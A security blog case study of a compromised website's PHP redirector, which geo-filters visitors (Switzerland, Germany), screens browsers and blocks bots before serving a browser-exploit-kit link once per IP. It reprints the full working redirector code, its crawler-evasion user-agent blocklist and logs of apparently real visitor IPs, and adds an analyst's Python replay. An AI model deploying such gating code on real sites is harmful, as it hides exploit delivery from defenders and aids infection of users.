Sunday, February 22, 2015

A Case Study of Geo-location Filtering and Dedicated Malware Infections !

It is a widely known fact that the majority of infectious code (iframes redirecting to browser exploit packs, BEPs) is hosted on free domains or on compromised websites that are sold in the underground community. In my earlier presentation at the Virus Bulletin Conference (HERE), I discussed the IP Address Logging Detection Trick (IPLDT), which basically allows attackers to restrict the spread of malware to a dedicated audience on the Internet. For more about BEPs, read the previous research papers:


A simple workflow is discussed below:
  • The user visits the website serving the infectious code.
  • The infected website triggers custom code hosted by the attacker to check the following:
    • Geo-location of the IP address: if the geo-location of the end-user's IP address maps to one of the locations listed in the configuration file, the user's browser is redirected to the BEP for exploitation.
    • Whether the exploit code has already been served to this IP: if the database shows that the IP has already been served, the end-user's IP address is filtered and the BEP URL is not served.
  • When the user's browser lands on the BEP URL, a specific vulnerability in the browser (built-in components or plug-ins) is exploited to download malware.
In addition, filters are added for various automated spiders to deny access to bots and prevent the malicious website or its links from appearing in search results. Recently, I was analyzing a malicious website that was serving infectious code and redirecting the user's browser to a BEP to download malware by exploiting a specific vulnerability. However, the name of the exploit kit is not known. This analysis concentrates on the compromised website that performs the redirection of the user's browser to the BEP.

A code snippet extracted from the infected website is presented below. It clearly shows that the user-agent and the IP geo-location ("CH" = Switzerland, "DE" = Germany) are used as filters on the incoming HTTP traffic. Additionally, two files are generated as databases of the IP addresses that were either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link to the BEP URL from the infected website. Two details of the snippet are worth noting. The browser check, preg_match('/(msie|opera|firef)/i', $ua), only admits user-agents containing one of those tokens, so Chrome and IE 11 (whose user-agent string carries "Trident/7.0" and "rv:11.0" but no longer contains "MSIE") are written to sbase_bad.txt and served the decoy page even from a matching country. And the bot check is fed $_REQUEST['useragent'] rather than the $ua value taken from the HTTP_USER_AGENT header, so the uagents.txt blocklist only applies when the request carries a "useragent" parameter; the snippet alone does not show where that parameter comes from, while the ips.txt check applies regardless.

 <?php
 error_reporting(0); ini_set('display_errors',0);   // suppress all PHP errors and warnings
 // Returns true when the user-agent or the IP matches a pattern in the kit's blocklists
 function is_bot($myuagent, $myip) {
     $uagents = file('uagents.txt',FILE_IGNORE_NEW_LINES);   // regex fragments, one per line
     $ips = file('ips.txt',FILE_IGNORE_NEW_LINES);
     foreach ($uagents as $exp) {
         if (preg_match('/'.$exp.'/i',$myuagent)) {
             return true;
         }
     }
     foreach ($ips as $exp) {
         if (preg_match('/'.$exp.'/',$myip)) {
             return true;
         }
     }
     return false;
 }
 $countries = "CH;DE";                      // only these country codes are served the BEP link
 // page with the exploit (Russian comment in the original, garbled in the extraction)
 $good_link = "./banner.php";
 // decoy page (Russian comment in the original, garbled in the extraction)
 $bad_link = "./blabla.php";
 //
 $ip = $_SERVER['REMOTE_ADDR'];
 $ua = $_SERVER['HTTP_USER_AGENT'];
 $file = fopen("./sbase.txt","a+");         // IPs already served the BEP link
 $file2 = fopen("./sbase_bad.txt","a+");    // ip|user-agent of filtered visitors
 $already_showed = FALSE;
 // one-shot check: each IP receives the BEP link only once
 while (!feof($file)) {
     $buffer = fgets($file);
     $ip2 = $ip."\r\n";
     if(strcmp($buffer,$ip2)==0) $already_showed = TRUE;
 }
 // note: the bot check reads a request parameter, not the $ua header value above
 if (is_bot($_REQUEST['useragent'], $ip)) $already_showed = TRUE;
 if($already_showed) {
     include($bad_link);
 } else {
     require_once('./geoip/geoip.inc');
     $gi = geoip_open("./geoip/GeoIP.dat",GEOIP_STANDARD);
     $ccode = explode(";",$countries);
     $show = FALSE;
     foreach($ccode as $value) {
         // country must match and the browser must identify as IE, Opera or Firefox
         if(geoip_country_code_by_addr($gi,$ip) == $value && preg_match('/(msie|opera|firef)/i', $ua)) {
             $show = TRUE;
             fwrite($file,$ip."\r\n");
         }
     }
     geoip_close($gi);
     if($show) {
         include($good_link);
     } else {
         fwrite($file2,$ip."|".$ua."\r\n");
         include($bad_link);
     }
 }
 fclose($file);
 ?>

On checking the two files, the following stats were gathered:
  • Approximately 5881 unique IP addresses (users' browsers) were successfully redirected to the BEP.
  • Approximately 15737 unique IP addresses (users' browsers) were restricted from visiting the BEP.
The list of banned user-agents is shown below:

 Ask\s*Jeeves  
 HP\s*Web\s*PrintSmart  
 HTTrack  
 IDBot  
 Indy\s*Library#  
 ListChecker  
 MSIECrawler  
 NetCache  
 Nutch  
 RPT-HTTPClient  
 rulinki\.ru  
 Twiceler  
 WebAlta  
 Webster\s*Pro  
 www\.cys\.ru  
 Wysigot  
 Yahoo!\s*Slurp  
 Yeti  
 Accoona  
 CazoodleBot  
 CFNetwork  
 ConveraCrawlerDISCo  
 Download\s*Master  
 FAST\s*MetaWeb\s*Crawler  
 Flexum\s*spider  
 Gigabot  
 HTMLParser  
 ia_archiver  
 ichiro  
 IRLbot  
 Java  
 km\.ru\s*bot  
 kmSearchBot  
 libwww-perl  
 Lupa\.ru  
 LWP::Simple  
 lwp-trivial  
 Missigua  
 MJ12bot  
 msnbot  
 msnbot-media  
 Offline\s*Explorer  
 OmniExplorer_Bot  
 PEAR  
 psbot  
 Python  
 rulinki\.ru  
 SMILE  
 Speedy  
 Teleport\s*Pro  
 TurtleScanner  
 User-Agent  
 voyager  
 Webalta  
 WebCopier  
 WebData  
 WebZIP  
 Wget  
 Yandex  
 Yanga  
 Yeti  
 msnbot  
 spider  
 yahoo  
 jeeves  
 google  
 altavista  
 scooter  
 av\s*fetch  
 asterias  
 spiderthread revision  
 sqworm  
 ask  
 lycos.spider  
 infoseek sidewinder  
 ultraseek  
 polybot  
 webcrawler  
 robozill  
 gulliver  
 architextspider  
 yahoo!\s*slurp  
 charlotte  
 ngb  

A number of IP addresses with their respective user-agent strings, in the ip|user-agent format written to sbase_bad.txt, are presented below; these visitors were not allowed to load the BEP URL in the browser for exploitation. Most of them carry Chrome or IE 11 user-agents, which the (msie|opera|firef) check rejects regardless of the visitor's country.

 77.120.162.20|Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16  
 77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko  
 194.124.140.39|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko  
 41.249.252.199|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko  
 213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36  
 46.126.65.93|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko  
 194.179.92.135|Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0  
 213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36  
 93.199.31.78|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; tb-webde/2.6.0; rv:11.0) like Gecko  
 77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko  
 188.63.105.11|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko  
 77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko  
 84.253.30.110|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko  
 194.179.92.135|Mozilla/4.0 (compatible;)  
 189.19.165.228|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36  
 66.102.6.183|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36  
 66.249.93.223|Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14  
 81.62.35.97|Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko  
 195.78.246.18|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36  
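To triage such a site from the analyst's side, the kit's decision logic can be replayed offline against captured records. The following Python is an added example written for this post, not code from the infected site or from the kit's authors: it reproduces the checks of the PHP snippet above (one-shot IP gating, bot-pattern blocklist, country list, browser regex) as described in the workflow, runs a handful of the uagents.txt patterns from the list above against common fetch tools, and explains the sbase_bad.txt records listed above from their user-agent alone. Assumptions: the bot patterns are a subset of the page's list, the sample records are copied from the listing above, the test IP 198.51.100.7 is a constructed placeholder, the replay feeds the User-Agent header to the bot check (the PHP feeds $_REQUEST['useragent'], whose origin the snippet does not show), and the country code is passed in explicitly because no GeoIP database is bundled.

```python
import re
from collections import Counter

# Filter parameters copied from the PHP snippet above.
ALLOWED_COUNTRIES = {"CH", "DE"}                      # $countries = "CH;DE"
BROWSER_RE = re.compile(r"(msie|opera|firef)", re.I)  # preg_match('/(msie|opera|firef)/i', $ua)

# Subset of the kit's uagents.txt patterns from the list above (assumption: a subset
# is enough to show the mechanism; the real file has about eighty entries).
BOT_PATTERNS = [r"HTTrack", r"Java", r"libwww-perl", r"Python", r"Wget", r"Yandex",
                r"google", r"spider", r"User-Agent", r"Indy\s*Library#"]
BOT_RES = [re.compile(p, re.I) for p in BOT_PATTERNS]  # the kit wraps each line in /.../i

# Records copied from the sbase_bad.txt listing above (ip|user-agent, one per line).
SBASE_BAD_SAMPLE = """\
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
194.179.92.135|Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
66.249.93.223|Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14
"""


def is_bot(ua):
    """Mirror of the PHP is_bot() user-agent loop (the ips.txt loop is omitted here)."""
    return any(r.search(ua) for r in BOT_RES)


def decide(ip, ua, country, served):
    """Replay the kit's decision for one request.

    served is the in-memory stand-in for sbase.txt: the set of IPs that already
    received the BEP link. country is the two-letter code the kit would get from
    geoip_country_code_by_addr(); it is passed in because no GeoIP data is bundled.
    Returns (page, reason) with page "exploit" (banner.php) or "decoy" (blabla.php).
    """
    if ip in served:                       # sbase.txt loop: each IP is served once
        return ("decoy", "ip already served")
    if is_bot(ua):                         # uagents.txt blocklist (assumes the header UA)
        return ("decoy", "user-agent on bot list")
    # The PHP tests country and browser in one condition; they are split here so the
    # analyst can see which of the two rejected the request.
    if country not in ALLOWED_COUNTRIES:
        return ("decoy", f"country {country} not in CH;DE")
    if not BROWSER_RE.search(ua):
        return ("decoy", "user-agent not msie/opera/firefox")
    served.add(ip)                         # fwrite($file, $ip."\r\n")
    return ("exploit", "geo and browser filters passed")


def parse_sbase_bad(text):
    """Split ip|user-agent lines as written by fwrite($file2, $ip."|".$ua."\\r\\n")."""
    records = []
    for line in text.splitlines():
        if "|" not in line:
            continue
        ip, ua = line.split("|", 1)        # split on the first '|' only
        records.append((ip.strip(), ua.strip()))
    return records


def summarize(records):
    """Count unique IPs and, from the user-agent alone, the check that explains the rejection."""
    reasons = Counter()
    for _, ua in records:
        if is_bot(ua):
            reasons["bot pattern"] += 1
        elif not BROWSER_RE.search(ua):
            reasons["browser regex miss"] += 1
        else:
            # UA would have passed: only the country or the one-shot IP check remains
            reasons["geo or repeat visit"] += 1
    return len({ip for ip, _ in records}), reasons


if __name__ == "__main__":
    n_ips, reasons = summarize(parse_sbase_bad(SBASE_BAD_SAMPLE))
    print(f"{n_ips} unique rejected IPs; causes from UA alone: {dict(reasons)}")
    for tool_ua in ("python-requests/2.31.0", "Wget/1.21.4", "curl/8.0.1"):
        print(f"{tool_ua!r} blocked by bot list: {is_bot(tool_ua)}")
    served = set()
    ff = "Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0"
    for attempt in (1, 2):                 # same constructed IP twice: second visit gets the decoy
        print(f"attempt {attempt}:", decide("198.51.100.7", ff, "DE", served))
```

The point for an analyst is in the last loop and in the summary: a fetch carrying a Chrome, IE 11, python-requests or Wget user-agent never reaches the BEP link, and a second fetch from the same address is served the decoy even when the first one succeeded, so a single capture from one IP is all the evidence the site will ever give. Of the five copied records, only the Firefox one cannot be explained by the user-agent, which leaves the country check or a repeat visit.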

Inference: BEPs extensively use IPLDT to manage infections and to ensure that the malicious code is served only to dedicated countries.

Sunday, February 8, 2015

Virus Bulletin Paper - Prosecting the Citadel botnet !

Virus Bulletin earlier published our research on Citadel. Check the links:

 Full PDF paper : https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf